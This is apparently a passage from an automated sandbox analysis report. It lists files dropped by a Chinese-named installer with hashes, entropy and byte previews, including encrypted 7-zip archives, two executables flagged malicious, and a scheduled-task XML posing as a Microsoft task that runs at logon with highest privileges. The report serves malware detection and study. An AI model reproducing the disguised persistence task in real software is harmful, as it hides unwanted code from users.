                                                        Preview:.@S...._..l ..............).....TcxC..xe.Q.....?E6jnzk.g;..aW;'...!+..y.....Jc..r.U..z.f.hI4A...3t.C...<..g,...~.O.f......%x.R..s.HMG.{.......3.Vpk%.......W.........,....V..q...Ro.8,U.q...........?c.q....+.(S._...v.)~...8.P..t.R..!..9.B.....f..F.}.....s_L..w..G...;...K..z..O.`.d.Z..9...s7u.3...fe.w..Y....{...?.@.:v..F2 -.....a..s......5dV...n.${..k.F%].v.'.....9.|.y..#N..c....0...f.e6.SY......x.e......#K.0...&..i.(.J...T..t..V..gk....+^FN@J0R.Z..bB.>...xk....xh..i.!1<..A>p...y...(........[..u~q..L.OH.-Y.....".....k/1`...7..@.o.C.P.(g@...m:-..|.B...{~.-('.......;.kZ..c..y..w3u4.;...../-G.V.g....y.-hV~P......@.,...C...N.{{p..X.......*H...Tu..&...qTo..>....}P....>.:F|.....5.......$..>c...].._......b...+y..Pc..G.(...o.|.....V]/..\....^)..ERB2.X.........K\(........~^.m..v...).'..M.:...3<..e..&Uj.........,..-9.}.....VI..:..<....6R.{Tl.X....j&C....vI,*...x;....CX.......b.6[..CB....J...k.j.p. e..c.8(...v....d..,.E.!j.V...#.H..3..W.$
                                                        Process:C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp
                                                        File Type:7-zip archive data, version 0.4
                                                        Category:dropped
                                                        Size (bytes):56546
                                                        Entropy (8bit):7.9970203857381925
                                                        Encrypted:true
                                                        SSDEEP:1536:drlLRqRByqzVF8GNxmsf+KlTzr3Dq9MgvNeIRlQj:dr+BtVF8GnmsxcMg1eIRSj
                                                        MD5:749867F354FA0A2E41EBC1FD6F8DC516
                                                        SHA1:C8D2532139FE2A265D4ED10E30A807176F8F3BAA
                                                        SHA-256:B80ADB9791998685A921FFFEFBE66B059F56C0CF0055DBBCCB4515B60F6337C1
                                                        SHA-512:14D24D465B4608DE0FE31D86C45D20F4A97C492D13F12FA62EF7290AC1CB2FE9A65FA09702497E76FBDF8D9894487B7D9E182E514B7EE3785F824DC944709492
                                                        Malicious:false
                                                        Preview:7z..'.....:u........2........4.!.-.....N...H..M 18.....&..G.....VHJ..@..1.x.9....P.U....<...}.V.k.^....Q..VX4.!D.=..3F...;.P....n.....L..j.&.?.0^....E...i\A.5F...CzO..D..]&B..Z .L}...Z..m.P...OI.5J"{./...5v.u...:.1.....mA..V.?...PW.z*...b.4.d.g..`.+`?PE....o...\...M...Z;.N....0....1t.&(I....B...j.........9...T.O.u...m<....[..7..v4..W..#L^c..P.).+.G......f.)x.S...8.l. -.]...\k.4.<.n....Q0.D.I.:.(#PU.CLe...B.P...M~.N.4e...%.......Hp...(.o.......3.iF..".w.b..A-6...R......R...pc5L.....fgN.=_7U/.E..z.M....3R.5qq.)....p.?....X(.l..o.s.t.I..6U.T....K...d.......!..i.O.....U...z.w....m..7+....).&..S.M.......[Z.j....e.k.k.7.n...a..LR.>..-.85....x.y}.....v...g...r..C.....N.U3{(..'..\l.....{...5$.|..=^...l...R...(.f...=.;...m.=>.w....5.]..q.. *O.....`.{.|..TR#\z......(ETpTV..}.q..y`....53.P..,H'.../W..0..[..h..]...-...y..8InU.}..6......%T.sI..)...9.UYyZ...4{1n......5=..._7`4....h+..g.V...M...YR..&8...}...#(....g.-..?a7q9.%pu.'._...N...C.t...XNZ.L.
                                                        Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):56546
                                                        Entropy (8bit):7.996966859255975
                                                        Encrypted:true
                                                        SSDEEP:1536:crCPEbYP46GiC3q6cGOlLvjmS9UWgvy/F2QFtTVAe:iCIR913q8wjmS9bhKe
                                                        MD5:CEA69F993E1CE0FB945A98BF37A66546
                                                        SHA1:7114365265F041DA904574D1F5876544506F89BA
                                                        SHA-256:E834D26D571776C889E2D09892C6E562EA62CD6524D8FC625E6496A1742F5DBB
                                                        SHA-512:4BCBB5AD50446CD4FAD5ED3C530E29CC9DD7DDCB7B912D7C546AF8CCF7DA74BC1EEC397846BFB97858BABC9AA46BB3F3D0434F414BBC3B15B9FDBB7BF3ED59F9
                                                        Malicious:false
                                                        Preview:.@S....c...l ...............3...Q...R]..u&.(..c...o.A..q?oIS.j..O[..o..&....L)......Rm.jC,./....-=...Z.;..7..tH..f...n#.7.P#..#o..D..y....m........zH.!...M.|......Vs.^.Rb.X`....y.T.Sg....T.....E.?/.H.;h.)P.#.pz.LOG$..."L(.....?.D*.6g.J!.>.....f.....J..B..q...;w]9.v...V...$....L/m.H#..]...G....QQ..'.z.!NW~..R..y....E.)....m.k%....+....>....02../..M....b.l..f7..f?-~_..E.5.~....*.'....8?.n........x...#....9.........q.q.n...\....D.Uv9.9...P.j7P~q9[BV...>C..[F..k-UL(jfT..\..{d.v;.5.e.fb.3^+...Z|]S3G...$..H=.W..c...B...).v.D!...s...+.K...~=..l.2...X.m.-....m0.....p...>...d......e.J..gUr*4....vw.........T.cQ......\...]...Z{..q..n..'Ql.$..V.U9..j 4...9<..6i.....5.F.).k.LQ4.H...2..p.*.bQJ..4.K'C...#.%"q.u../zoXL...L...........'..g11=E.....y.8...~.Oe..X....u.M8.T.....Qq.m.........i....F.4e.([Hm.*...E....2........s. *R..{."4.x.]...-.....xQ@.z.......Bz.).[..C...T..".....q............M.X..CQ..A..........d...`S.3...e.X.....u.>.!..;k...>..
                                                        Process:C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp
                                                        File Type:7-zip archive data, version 0.4
                                                        Category:dropped
                                                        Size (bytes):56546
                                                        Entropy (8bit):7.996966859255979
                                                        Encrypted:true
                                                        SSDEEP:1536:cWsX30GkPK2rw7bphKKdxDBxjqtalDFMflaX4:cZXhkPhr+TRJqtaK
                                                        MD5:4CB8B7E557C80FC7B014133AB834A042
                                                        SHA1:C42E2C861FF3ED0E6A11824E12F67A344E8F783D
                                                        SHA-256:3EC6A665E7861DC29A393D00EAA00989112E85C6F1B9643CA6C39578AD772084
                                                        SHA-512:A88E78258F7DB4AECD02F164E6A3AFCF39788E30202CF596F9858092027DDB2FDB66D751013A7ABA5201BFAFF9F2D552D345AFE21C8E1D1425ABBC606028C2E6
                                                        Malicious:false
                                                        Preview:7z..'....O; ........2.......D.X..Z.2..7nf..R..s# s..v.f.....%G..>..9..Jh.-j.r..q.2.=v..Q.....SW7....im..|.c...&...,.s....f.h...C.g~..f.7=9...,...sd....iD......cR.^...$..<....nd...S.O..E)0..SQ.AA.C..$.D.|. a.:..5.....b.....2......W.....Z.pS.b/.F.;|`...O/....@.......4.".b.(...4...,..h/.K$..r!...."..`.S...D?.":...n..f.{C..t..,/.S.0.N..M...v...(.Yn..-.)..-...N~....}..).. .j!...1H.7?R..X.....rKi....9.i[k..+.....Br\.=.k.t8...6Lmh.../.V^K.f.......*.@MM..`...,W.......E..v.H....0.W..~....I.....w....<....X.Azl.FH..6\.a..E?=..I.q.5...s...;.,J.0..J.../.w..,..n.EkN..,j....f.y&q.C}fnY..2\......0.....N!.J..H.H0.....BJ.Q..v}=......^c.'w..#...d.T1....#...2s}N.....2.%.?. ....l.).....a<5Y.s....}...2*.#s..]0h..._G....3].....7y.}.B.6...ywE....'q.....h..?p .#..Emm2..F..| .M.Rv!.v.G....1L.Kx...T...".a6.%S0..g..7.......J.vjO.{.A....B@.c.y>}.....N.+....:.L=[....._.....Y.{....F..|.w.oX..t&[.....a\.M..2.Qe.[}L.Ch[...G.S#.$9...8<..W.d1...*PH.`.....4.A.......?..g.
                                                        Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):31890
                                                        Entropy (8bit):7.99402458740637
                                                        Encrypted:true
                                                        SSDEEP:768:rzwmoD5r754TWCxhazPt9GNgRYpSj3PsQ4yVb595nQ/:vwmolXaT9abVzP1TC
                                                        MD5:8622FC7228777F64A47BD6C61478ADD9
                                                        SHA1:9A7C15F341835F83C96DA804DC1E21FDA696BB56
                                                        SHA-256:4E5C193D58B43630E16B6E86C7E4382B26C9A812D6D28905DD39BC7155FEBEE1
                                                        SHA-512:71F31079B6C3CE72BC7238560B2CBD012A0285B6A5AC162B18EAE61A059DD3B8DBCF465225E1FB099A1E23ED7BDDF0AAE4ED7C337A10DC20E0FEEC4BC73C5441
                                                        Malicious:false
                                                        Preview:.@S......................xi.\ .~.#..:}..fy?koGL^|kH.G...........x....Tg.Y.t....~^..".L.41.....R..|.....R...C.m(.M&...q.v.$..i..U.....).PY.......O.....~..p.u.Y.......{...5^q.|a.]..@DP".`Rz}...|N.uSW.......^..o...U..z...3...bH........p.......Y`..b.t.x.F^i.<.%.r.o..?w.Z..M.fI.!.a...Zsb.+.y..W...n.....;...........|.{.@Q.....#".M...4.A).#;..r...>E..]w{.-....B...........v..`...S...sY....h.Sa)...r.3.U;n8wXq.x...@^z...%8H.Zd._..f~.....u[..q$..%......C..../].rS.....".=..<o.<S....-^"..iIX..r...D.......k.P.e...U..n.]^p..pal....E.c..+..Gc..U?s.R...p...:>..v..o2..B.Hn..q...F..3.o...%.......C......*.V..|..2.J..i.r....|;T.C6).......a..~"K....Y.....]3.{{..N...X>.1.....:?....,..T+=s...............so.;....&....Q.\K..b............k,..#l...Yb...VE.g.3v.$'.H3......w.....{f..e.....PS.tQ..*.8a....5w....\8%..c.;......q.j.t0/.8s..(9....... .S...0.o.o......f*..]....U..>N....Kc/..ka.I"O-O.!./..S".IN .....%G...........x%..ZL`Sq.;.}w.`..k.....F.........Tp..}..?t..
                                                        Process:C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp
                                                        File Type:7-zip archive data, version 0.4
                                                        Category:dropped
                                                        Size (bytes):31890
                                                        Entropy (8bit):7.99402458740637
                                                        Encrypted:true
                                                        SSDEEP:768:jh43RfBLJT55mgLMoqX3gX/i69sXCuWegxJr8qF88M:qhj+I7qCKNSegPnFM
                                                        MD5:CE6034AFC63BB42F4E0D6CD897DFBCB8
                                                        SHA1:49E6E67EB36FE2CCAA42234A1DBB17AA2B1C7CC0
                                                        SHA-256:7B7EB1D44ED88E7C19A19CEDAA25855F6800B87EC7E76873F3EA4D6A65DAA25F
                                                        SHA-512:7801FA33C19D6504FF2D84453F4BB810FD579CB0C8772871F7CC53E90B835114D0221224A1743C0F5AAE76C658807CC9B4EC3BEC2CAD4AB8C3FD03203DAA7CF0
                                                        Malicious:false
                                                        Preview:7z..'....oYU@|......2.........Z....f..t.#.............tb.7E..Jo.........b.I=.Y..6(..=....^..>i.^E.."q.$&8....N...p+.p. .P.z6.b,.8kdD......'...G.R.n.&5..C..H.E..So!T^n{.a#d....z.SB........Nb.........LO+B ...iV..HH.Cc*.o@|.....Yvxb^.cW....._.........m.}.(V.i.H$....R....`.M.p......A?....._..nb..D.*RT<bUV.n].....LD.qU.....U9....]...h..y!...I....&C......g`...YahZ.q4.{.....2ZRG..f.. .M....:t .........8..Eg.....o.....h.]{..........p...M...lh.@.(R.]!B.:...b78$...b.......hc...C~....I..B<.x_OB|...<. .=NZ.....z........sjJ.....*{<..L.......^...9..^d..$d..}......#.dL'~.}....M...j.(5..@.tcVm.H..-.n...D..&....<..Z...@]./7?...[..qfW..!...v...==..d..M..om~).....C..9....c<..WUV.ed.h...]....OCt(X.H<<:.9..{5j....Nh.L.$..>..D..haP..~...............}r=!.E.ng..........9+...2.g.H3Lx.Bu....]jC...q.g.g.U.4..<........)....oo.T.c_.......X.,.@...nu......D.B(~.5....x5...............4S7B..p...Uk.0-m.VM.M@.V\.o...(......".k..w....Z.([.@.MQ.i9..."W..m...N.,.
                                                        Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):74960
                                                        Entropy (8bit):7.99759370165655
                                                        Encrypted:true
                                                        SSDEEP:1536:x2PlxAOr0Y07RqyjjkFThaVNwDsKsNFBrFYek36pX4MDVuPFOnfIId+:QAOrf07RHjkFThaVGMLF3hNDcPFOn5s
                                                        MD5:950338D50B95A25F494EE74E97B7B7A9
                                                        SHA1:F56A5D6C40BC47869A6AE3BC5217D50EA3FC1643
                                                        SHA-256:87A341B968B325090EF90DFB6D130ED0A1550A1EBDE65B1002E401F1F640854A
                                                        SHA-512:9A6CC00276564DDE23D4CABA133223D31D9DDD06D8C5B398F234D5CE03774ED7B9C7D875543E945A5B3DB2851EC21332FE429A56744A9CC2157436400793FF83
                                                        Malicious:false
                                                        Preview:.@S........................F.T....r...z'I.N..].u.e.e..y.....<|r.:v.....J.i...L.Sv.....Nz..,..K.sI*./.d.p.'.R.....6eF....W{."J.Nt'.{E....mU_..qc.G..M..y.QF)..N..W.o.D!.-...A$.....Nc.(...~.5.9'..>...E..>.5n..s..W.A7..../..+..E.....v..^&.....V..H6..j..S`H.qAG.R.i^&....>@SYz.@......q.....\t=.HE...i..".u.Z.(y.m..3.0\..Wq9#.....iH7..TL.U..3,b........L...D..,..t(mS..06...[6.y....0-....f.N7..R......./..z.bEQ.r..n.CmB'..@......(...l..=.s........`.6.?..[mzl....K.5"..#*.>.~..._...A.%b..........PnI.T...?R~JL<.$V..-.U..}\..t/F..<..t....y(K..v..6"..'.!.*z.R....EJ0.d<v:.R&......x...2....;Tc..(..dW...7a.)...rq.....{"h.wbB..t)f..qj........~.XR.a/........l./.S......".%?.C.cL._.,k.n'....a./.z...{.]...<......._pFP..d..,......Q...[........3...Kq).rJ..8..I.)o...i'Q..=......(dq(.m../..%=.......r m.X|3.......b.~tA.......%+.T..E@..ce...%....,..x#...,....-....A...q.....r.+...?......L..%.c.... ..>.Iw......P...O)...$`.'..D1.r.....*..9;..R...VL.]..%j.....TM.4.....P.L...
                                                        Process:C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp
                                                        File Type:7-zip archive data, version 0.4
                                                        Category:dropped
                                                        Size (bytes):74960
                                                        Entropy (8bit):7.997593701656546
                                                        Encrypted:true
                                                        SSDEEP:1536:xsn0ayGU0SfvuEykcv5ZUi4Q9POZBgfmWRDOs2XwV1NN4+8wbr82nR+2R:xY0ntfvwkcv5ZwYPCBgfmW/VDS+FbrLN
                                                        MD5:059BA7C31F3E227356CA5F29E4AA2508
                                                        SHA1:FA3DC96A3336903ED5E6105A197A02E618E3F634
                                                        SHA-256:1CBF36AFC14ECC78E133EBEC8A6EE1C93DEA85EEC472CE0FB0B57D3E093F08CC
                                                        SHA-512:E2732D3E092B0A7507653A4743E1FE7A1010A20D4973C209BA7C0B2B79F02DF3CFDB4D7CE1CBFB62AA0C3D2CDE468FC2C78558DA4FF871660355E71DC77D8219
                                                        Malicious:false
                                                        Preview:7z..'....G8{p$......@..........0..$D.#'7..^..G.....W.K^.IC;.k...)_...S...2..x.....?(..Rj.g.......B...C..NK.B0s..L?.$..].....$r..E.]~...~K..E..3.......t..k..J......B...4.?!..6r.Qqc.5.r...\..,A.JF.J...Vb..b...M.=^.K7..e..]...X.%^3T...D.y..e2..>...k...\...S.C....')......hhV..K...z4..$d....a[.....6.&.D.:.=^.8.M[....n..i[....]..Y.4...NpkjU..;..W5.#.p.8?u....!.......u.[?.$..^.}f.A..G.N...b7.*...!!.(.....Gc..........Dg....Z.*.#.\".e.m.).t.5..r...6"....Q......fx..W......k..K7^."C.4*Z.{.^WG.....Z..P......Z....7R.....5hy...s....b.....7.V.....k.=.y.i.i......Y.......FY$.|T.5..V...E|...q.........].}bl...y.....;...q....-a..RP3..L~k....|..p_......."......rJz."..v......Z....l1.O.N...Di...O.:m.X...W.......x..}..>ktk.,.~...n-.m..`...G......$.....].lPx..<..9.m4.n...d....G...{'.a........u).R.+.....y.`.p...1@..!..b...J.W..Vt,......h...k....W.,..@Sd.<ZG......}&.R.]p(Y...o...r.4m:.J`.U..S5.iN...^!Y..hHP.B.58....JvB.K.k;...4........\.6=&erz..2..&...Z.C...h_.
                                                        Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):29730
                                                        Entropy (8bit):7.994290657653607
                                                        Encrypted:true
                                                        SSDEEP:768:e7fyvDZi63BuPi2zBBMqUp6fJzwyQb91SPlssLK4:AfKNiG/2vMx6fJzwVb2tss7
                                                        MD5:2C3E0D1FB580A8F0855355CC7D8D4F7A
                                                        SHA1:177E4A0B7C4BC8ACE0F46127398808E669222515
                                                        SHA-256:9818FEBDE34D7E9900EB1C7A32983CA60C676BE941E2BC1ED9FBD5A187C6F544
                                                        SHA-512:B9410FC8F5BE02130D50E7389F9A334DD2F2A47694E88FBB9FB4561BD3296F894369B279546EEBB376452DF795C39D87A67C6EE84C362F47FA19CF4C79E5574E
                                                        Malicious:false
                                                        Preview:.@S....*z.p,..................kcn..a.^.<..=......7`....6..!`...W.,2u...K.r.1.......1...g<wkw.....q..VfaR...n.h.0b[.h.V$..7.7'd.....T.....`.....)k.....}..........bW'.t..@*.%e5....#.6.g.R.......,W....._..G.d...1..e/...e7....E.....b....#Z,#...@.J.j?....q.ZR.c.b.V....Y-.......3..&E...a.2vg$..z...M9.[......_.1U....A...L.0+3U.[)8...D........5......[..-.u...ib...[..I-....#|j..d..D.S.'.....J.`.....b..y...Iu.D.....2.r}.4....<K.%....0X..X[5.sD...Xh.(G...Z;.."..o..%.......,.y..\..M6.+,.]c..t.:.|...p%.../1%.{>..r..B..yA.......}.`.#.X....Rl`.6\~k.P8..C....V\^..2.7...... h. .>....}..u)..4..w..............^N...@.v....d.P...........IA.. G?..YJ>._La..Y.@.8N.a...BK.....x.T....u.....\x.t...~.2p.M..+.R&w.......7c!v.@..RGf.F.>^+.b=........@l.T5.:........#}.%>.-.C.[XR.TG.\..'....MH..x..Y...cL........y.>....%...:.S.W^..k.EE.5O`.6<5-kh_...."95..:p....P.jk`....b.7.Z.8Y....H(j2y..`d.q;RyZ.5$..3.;......0,......+O.....L.,..u.s....S.1o.g...l"..e.....Cy<....I.+..B@......~.0...<.
                                                        Process:C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp
                                                        File Type:7-zip archive data, version 0.4
                                                        Category:dropped
                                                        Size (bytes):29730
                                                        Entropy (8bit):7.994290657653608
                                                        Encrypted:true
                                                        SSDEEP:768:0AnbQm4/4qQyDC44LY4VfQ8aN/DObt1dSt3OUqZNKME:0ab6c4oY0aBDObjot+Uqu7
                                                        MD5:A9C8A3E00692F79E1BA9693003F85D18
                                                        SHA1:5ED62E15A8AC5D49FD29EF2A8DC05D24B2E0FC1F
                                                        SHA-256:B88E3170EC6660651AF1606375F033F42D3680E4365863675D0E81866E086CC3
                                                        SHA-512:8354B80622A9808606F1751A53F865C341FF2CE1581B489B50B1181DAA9B2C0A919F94137F47898A4529ECCCD96C43FCCD30BCDF6220FA4017235053AF0B477D
                                                        Malicious:false
                                                        Preview:7z..'....G..s......2......../.....h..f...H=...v.:..Q.I..OP.....p..qfX.M.J..).9;...sp......ns./..;w....3.<..m..M.L...k..L..h[-Dnt.*'5....M(w%...HVL..F&......a...R.........SF.2....m@X&X5.!....ER......]xm.....\.....=.q.I.}v.l#.B........:.e....b6.l.d..O......H.C..$.',.B..Q\..\.B.%...g...3?.....*.XuE.J.6`.../...W.../......b..HL?...E.V[...^.~.&..I,..xUH..2V..H..$..;.....c.6.o........g.}.u:.X....9...|Ynic.*.....ooK..>..M~yb..0W....^..J(S......Q?...#.i.1..#.._.9..2E.S7c.....{..'...j.A.p......dS]......i.!..YS...%.Q<..\.0.....FNw....e...2...$..$4..Pv.R...mv...-.b.T.)..r*..!..).n4.+.l[.N...4qN....w.B..[......<U.etA.A....SB..^y.......^0.f._.&..Z.zV.%.R.f_dz.,E..JJ..%.R.7.3m.:..;.`...AoHLHC..|..)f...C....$...E....H"x..F....wW...3"......Y.*Y.....5....,E...tn.KS...2......w\Z..1.".O.=+..A...2.....A.........k. c..../2..i!q..q...u.'.m.6.j.\.....x...S....$....*.&(.).^..f.d.g"j..#^....W.]{.C.?2Z.'X...5.._@..q.j..Xb...n{1..<.i...'r...7'.F.L\(.8
                                                        Process:C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp
                                                        File Type:7-zip archive data, version 0.4
                                                        Category:dropped
                                                        Size (bytes):249984
                                                        Entropy (8bit):7.999231321310215
                                                        Encrypted:true
                                                        SSDEEP:3072:bq197wBcGJFKwAA/THosHch/5mC8rR2rUPXPMzBQZ3N0AVebaKsjBL2Itvz38sho:e2ckFr8h/5Ct2rUM1QVdw+KeySr3Fet
                                                        MD5:F81297786EB640B840BB7B630C00C588
                                                        SHA1:6B29628368E57D349B617755224ABB6A17FA61EF
                                                        SHA-256:ED33C18470A3C637FF0EA85152913C814CB959AC3F6C95AB505E7BD70C6D218F
                                                        SHA-512:45990D001BDB62654086B6D9D59B6D1545104DCC8C4D6D9D5F6B2A88F986C097A637F726DD56A23AA9538E9BC03ABE4AD9B159F61BF61D21B4CB21C4FDD7FB26
                                                        Malicious:false
                                                        Preview:7z..'...... .......@..........inxr.f\....../_...]...T...N@w[..1.A.f..e+.G.F...d]r.'sO:..B.....My.a.M.....gL.Q..}fI."H......cj........nu...4.y.J`....\,+sxS.e...o...o.n}..K|j},.Oh....l6[.-..a......C..f}.u....P..Q6]...XN..<2p....&r..qV..'...BV.t............l..1...../qq.v.V.^.6....a.)e.R..fr$.:G?.3....)..M..n.B.c..o.uC..y..........Z...u..9V.JE.>....x.f0@.E...>...r.r.W.............D..z.... ..D...*:.n.J.%..?.....E.a..j.............-...1....X..aRC>.2.,..0k...D.3+?..'.J.r...Q..#E.nH..;.>../JL.9&J<.$q......7.B.u...........yB......<....?...`._I.6.g.G.o.....H5.y.........w..qv..#(..v..?U..n..=..|...s..??\...F...Q.\k..v.m K....A..:....kY$......0g7#.5.|.W...M..b.d........j..........$..O....!.|N[=.P};.j..c....tJ&......p..cC.T...ai.....sJ...../..f .+.HD5.P(.nI..P[.T.*.....y..'../9..]_...`...SYc.IlK.7.f..j...J..pWF...z.<...w..!:.;f.U.~.3.J.@C.:.......ZB*.l.....%.....t"..4.".\.jA...sZ=.W.(<...aH.,E.k..:.......:.H.F4.?.E..O.oi..y...0.e.G.B....Ov.l...........
                                                        Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                                        File Type:PE32+ executable (native) x86-64, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):63640
                                                        Entropy (8bit):6.482810107683822
                                                        Encrypted:false
                                                        SSDEEP:768:4l2NchwQqrK3SBq3Xf2Zm+Oo1acHyKWkm9loSZVHT4yy5FPSFlWd/Ce34nqciC50:kgrFq3OVgUgla/4nqy5K2/zW
                                                        MD5:B4EAACCE30F51EAF2A36CEA680B45A66
                                                        SHA1:94493D7739C5EE7346DA31D9523404D62682B195
                                                        SHA-256:15E84D040C2756B2D1B6C3F99D5A1079DC8854844D3C24D740FAFD8C668E5FB9
                                                        SHA-512:16F46ABE2DD8C1A95705C397B0A5A0BC589383B60FE7C4F25503781D47160C0D68CBA0113BA918747115EF27A48AB7CA7F56CC55920F097313A2DA73343DF10B
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 9%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s.[.7.5N7.5N7.5N7.4NX.5NA'NN4.5NA'HN5.5N.|XN4.5N.|HN6.5NA'XN6.5N.|DN0.5N.|IN6.5N.|MN6.5NRich7.5N........................PE..d....(gK..........".........."............................................... ..............................................................d...(........................(.......... ................................................................................text............................... ..h.rdata..............................@..H.data...............................@....pdata..............................@..HINIT................................ ....rsrc...............................@..B.reloc..0...........................@..B................................................................................................................................................................................................................
                                                        Process:C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):4096
                                                        Entropy (8bit):3.347034835751068
                                                        Encrypted:false
                                                        SSDEEP:48:dXKLzDlnlL6w0QldOVQOj933ODOiTdKbKsz72eW+5y4:dXazDlncwhldOVQOj6dKbKsz7
                                                        MD5:062A3AACBCFA04B7986F0AAB0F7767C0
                                                        SHA1:FD7A28C2D6B030B8E15622CEFFD824224F684973
                                                        SHA-256:F46F7F3F8B4763B62B3B2E02E24B0300E3AB741DD3770F93FCFE7D1A26B1C46D
                                                        SHA-512:9F0435883F31D801EFEC0A378473566F68CDD0DA9FBC36F2B431380D8E852E297891BD3AFC952E90CC5ED01C9041C79402FD774BFE98B036D73F9FDD65771B79
                                                        Malicious:false
                                                        Preview:<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2005-10-11T13:21:17-08:00</Date>. <Author>Microsoft Corporation</Author>. <Version>1.0.0</Version>. <Description>Microsoft</Description>. <URI>\kafanbbs</URI>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user</UserId>. </LogonTrigger>. </Triggers>. <Principals>. <Principal id="System">. <UserId>user</UserId>. <RunLevel>HighestAvailable</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAv
                                                        Process:C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp
                                                        File Type:PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
                                                        Category:dropped
                                                        Size (bytes):5649408
                                                        Entropy (8bit):6.392614480390128
                                                        Encrypted:false
                                                        SSDEEP:98304:jgRfP5jnFTyGZEWxSIBHVGT+t1ufqchZ:kRZDFTyGaHIJoWofqc
                                                        MD5:8C71B86BF407C05BAF11E8D296B9C8B8
                                                        SHA1:6624AB8CA883C48F02C58250D4EEE9E90098F4E4
                                                        SHA-256:BE2099C214F63A3CB4954B09A0BECD6E2E34660B886D4C898D260FEBFE9D70C2
                                                        SHA-512:BB3FEE727E40F8213F0A7D9808048E341295A684ECBA6F4DF52F1B07B528D7206CA41926B2433F4B63451565AD2854570FEE976BC7051B629ACD24FCA6D0F507
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................&.ZF..0V..<.............@..............................V.....L.V...`... ...............................................V../...........0O..............`V.\a...........................vL.(.....................V..............................text....XF......ZF.................`..`.data....z...pF..|...^F.............@....rdata.. 9....F..:....F.............@..@.pdata.......0O.......O.............@..@.xdata........Q.......Q.............@..@.bss.....;....U..........................idata.../....V..0....U.............@....CRT....h....@V.......U.............@....tls.........PV.......U.............@....reloc..\a...`V..b....U.............@..B................................................................................................................................................................................................................
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):64
                                                        Entropy (8bit):1.1628158735648508
                                                        Encrypted:false
                                                        SSDEEP:3:Nllluldhz/lL:NllU
                                                        MD5:03744CE5681CB7F5E53A02F19FA22067
                                                        SHA1:234FB09010F6714453C83795D8CF3250D871D4DF
                                                        SHA-256:88348573B57BA21639837E3AF19A00B4D7889E2D8E90A923151AC022D2946E5D
                                                        SHA-512:0C05D6047DBA2286F8F72EB69A69919DC5650F96E8EE759BA9B3FC10BE793F3A88408457E700936BCACA02816CE25DD53F48B962491E7F4F0A4A534D88A855E6
                                                        Malicious:false
                                                        Preview:@...e.................................L..............@..........
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
